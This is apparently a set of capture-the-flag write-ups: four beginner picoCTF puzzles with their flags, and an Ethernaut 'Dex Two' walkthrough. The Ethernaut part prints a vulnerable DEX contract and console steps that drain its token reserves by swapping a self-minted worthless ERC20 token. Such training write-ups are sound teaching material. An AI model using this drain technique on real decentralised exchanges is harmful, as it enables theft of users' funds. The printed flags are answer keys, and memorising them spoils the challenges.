PicoCTF - HashingJobApp

Challenge

Tags

Beginner picoMini 2022 / General skill / shell / python / nc / hashing

Description

If you want to hash with the best, beat this test!

nc saturn.picoctf.net 54555

Writeup

1. Run command nc saturn.picoctf.net 54555
2. Create a python script to transfer string to md5 hash

    import hashlib
    import sys
   
    def give_me_md5_hash(str):
      result = hashlib.md5((str).encode())
   
      # printing the equivalent hexadecimal value.
      print("The hexadecimal equivalent of hash is : ", end ="")
      print(result.hexdigest())
         
    give_me_md5_hash(sys.argv[1])
   

   Execute script in this way :

     python3 HashingJobApp.py "some string" 
     # The hexadecimal equivalent of hash is : 53a09ce3db9c4d42c862dc0e29d777e5
   

3. It will ask you for md5 hash of string it give three times like below.
4. Here’s flag: picoCTF{4ppl1c4710n_r3c31v3d_674c1de2} ٩(^ᴗ^)۶

PicoCTF - Glitch cat

Challenge

Tags

Beginner picoMini 2022 / General skill / shell / python / nc

Description

Our flag printing service has started glitching!

$ nc saturn.picoctf.net 65353

Writeup

1. We can simply create a python file to transfer ascii code to char.

    flag_enc = chr(0x39) + chr(0x63) + chr(0x34) + chr(0x32) + chr(0x61) + chr(0x34) + chr(0x35) + chr(0x64) 
    print('picoCTF{gl17ch_m3_n07_'+ flag_enc + '}')
   

2. Here ‘s flag: picoCTF{gl17ch_m3_n07_9c42a45d} ٩(^ᴗ^)۶

PicoCTF - fixme1.py

Challenge

Tags

Beginner picoMini 2022 / General skill / python

Description

Fix the syntax error in this Python script to print the flag.
Download Python script

Writeup

Remove whitespace at the beginning of the last line. Flag: picoCTF{1nd3nt1ty_cr1515_6a476c8f} ٩(^ᴗ^)۶

PicoCTF - Codebook

Challenge

Tags

Beginner picoMini 2022 / General skill / shell / python

Description

Run the Python script code.py in the same directory as codebook.txt.

• Download code.py
• Download codebook.txt

Writeup

1. wget https://artifacts.picoctf.net/c/100/code.py
2. wget https://artifacts.picoctf.net/c/100/codebook.txt
3. python code.py
4. Flag: picoCTF{c0d3b00k_455157_d9aa2df2} ٩(^ᴗ^)۶

Ethernaut - 23. Dex Two

Difficulty: 🌕🌕🌑🌑🌑

As we’ve repeatedly seen, interaction between contracts can be a source of unexpected behavior.
Just because a contract claims to implement the ERC20 spec does not mean it’s trust worthy.
Some tokens deviate from the ERC20 spec by not returning a boolean value from their transfer methods. See Missing return value bug - At least 130 tokens affected.
Other ERC20 tokens, especially those designed by adversaries could behave more maliciously.
If you design a DEX where anyone could list their own tokens without the permission of a central authority, then the correctness of the DEX could depend on the interaction of the DEX contract and the token contracts being traded.

Contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import '@openzeppelin/contracts/math/SafeMath.sol';
import '@openzeppelin/contracts/access/Ownable.sol';

contract DexTwo is Ownable {
  using SafeMath for uint;
  address public token1;
  address public token2;
  constructor() public {}

  function setTokens(address _token1, address _token2) public onlyOwner {
    token1 = _token1;
    token2 = _token2;
  }

  function add_liquidity(address token_address, uint amount) public onlyOwner {
    IERC20(token_address).transferFrom(msg.sender, address(this), amount);
  }
  
  function swap(address from, address to, uint amount) public {
    require(IERC20(from).balanceOf(msg.sender) >= amount, "Not enough to swap");
    uint swapAmount = getSwapAmount(from, to, amount);
    IERC20(from).transferFrom(msg.sender, address(this), amount);
    IERC20(to).approve(address(this), swapAmount);
    IERC20(to).transferFrom(address(this), msg.sender, swapAmount);
  } 

  function getSwapAmount(address from, address to, uint amount) public view returns(uint){
    return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));
  }

  function approve(address spender, uint amount) public {
    SwappableTokenTwo(token1).approve(msg.sender, spender, amount);
    SwappableTokenTwo(token2).approve(msg.sender, spender, amount);
  }

  function balanceOf(address token, address account) public view returns (uint){
    return IERC20(token).balanceOf(account);
  }
}

contract SwappableTokenTwo is ERC20 {
  address private _dex;
  constructor(address dexInstance, string memory name, string memory symbol, uint initialSupply) public ERC20(name, symbol) {
        _mint(msg.sender, initialSupply);
        _dex = dexInstance;
  }

  function approve(address owner, address spender, uint256 amount) public returns(bool){
    require(owner != _dex, "InvalidApprover");
    super._approve(owner, spender, amount);
  }
}

Writeup

1. Get new instance.
2. Create a ERC20 contract.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.6.0;
   
    import "https://github.com/OpenZeppelin/openzeppelin-contracts/blob/release-v3.2.0/contracts/token/ERC20/IERC20.sol";
    import "https://github.com/OpenZeppelin/openzeppelin-contracts/blob/release-v3.2.0/contracts/token/ERC20/ERC20.sol";
   
    contract MyToken is ERC20 {
      constructor(string memory name, string memory symbol, uint initialSupply) public ERC20(name, symbol) {
            _mint(msg.sender, initialSupply);
      }
    }
   

3. Compile & Deploy
4. Approve & Transfer
5. Store addresses to const (in console)

   
    const t1 = await contract.token1()
    const t2 = await contract.token2()
    const myToken = 'YOUR_MYTOKEN_CONTRACT_ADDRESS'
   
   

6. Get balance

   
    await contract.balanceOf(t1, contract.address).then(v=>v.toString())
    // 100
   
    await contract.balanceOf(t2, contract.address).then(v=>v.toString())
    // 100
   
    await contract.balanceOf(myToken, contract.address).then(v=>v.toString())
    // 100
   
   

7. Swap

   
    await contract.swap(myToken, t1, 100)
   
    await contract.balanceOf(myToken, contract.address).then(v=>v.toString())
    // 200
   
    await contract.getSwapAmount(myToken, t2, 200).then(v=>v.toString())
    // 100 
    // we can swap all myToken to get all t2 token!
   
    await contract.swap(myToken, t2, 200);
   
   

8. Check tokens’ balance

   
    await contract.balanceOf(t1, contract.address).then(v=>v.toString())
    // '0'
   
    await contract.balanceOf(t2, contract.address).then(v=>v.toString())
    // '0'
   
   

9. Submit instance ξ( ✿＞◡❛)